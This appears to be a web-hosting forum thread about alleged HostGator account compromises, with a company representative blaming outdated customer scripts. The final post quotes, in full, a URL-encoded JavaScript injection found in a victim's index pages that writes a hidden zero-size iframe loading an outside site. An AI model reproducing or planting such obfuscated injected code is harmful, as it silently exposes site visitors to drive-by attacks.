I had a site on hostgator. well not a site. i had a domain name pointing at a folder and that folder had one index.html file in it...now i have some whois fake website up and no word from hostgator
Wow... I was thinking about moving a few sites to host gator, please let us know how this turns out... I wonder if host gator has a history of security issues..?
We weren't not hacked. We host 700,000+ websites and every day dozens are hacked from out of date scripts or passwords. If we were hacked I would be the first person to know about it. I deal with like 5 of these type threads a week now, and every time we endup showing the customer exactly where their code was bad.
Unfortunately, outdated scripts are a true problem and the only cause of successfull hacking attempts most of the time. The webhost cannot be held responsible for the security level of the scripts used on the client websites...
Thanks for the info... I'm thinking about moving some sites over to you guys, but my worry is not only that a site could be hacked but also someone could see the source code... is this possible?
Everybody can see the source of the page. If you are talking about the source of the script that is not possible.
Yeah, I should have been more detailed... I meant the PHP source... I had another shared host before that allowed users to "telnet" to other clients folders somehow...
They would not be able to see it this way since we run php suex along with jailed shell. I don't always see these threads so if I don't respond please contact us at hostgator.com if you have any more questions we will be able to help you.
I can attest that I've had only good and positive experiences with hostgator. I highly recommend them.
Hostgator is good. But something very strange happened to me there. I was an affiliate and they closed my aff account because of fraud. Thats odd!!!!! As far as I remember there was only 2 or 3 people that had signed up through me. I asked for an explanation, but they didnt bother to answer. They may want to check their routines.
It wasn't bad code. When I renewed my reseller private name server it switched it back to enom's control and put up a wierd look Who is site in its place. Googling the information on the site, the first few pages of google results said it was a hack thing so I asked. that was it. i informed them of the problem and they fixed it however it did suck to have my domain for my private nameserver to go down for a bit because of some automation i am assuming
Recentely my hostgator account was hacked too. In all my domains the following script was put in my index.php and index.html files <!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E')); //--> </Script><!-- c65 -->
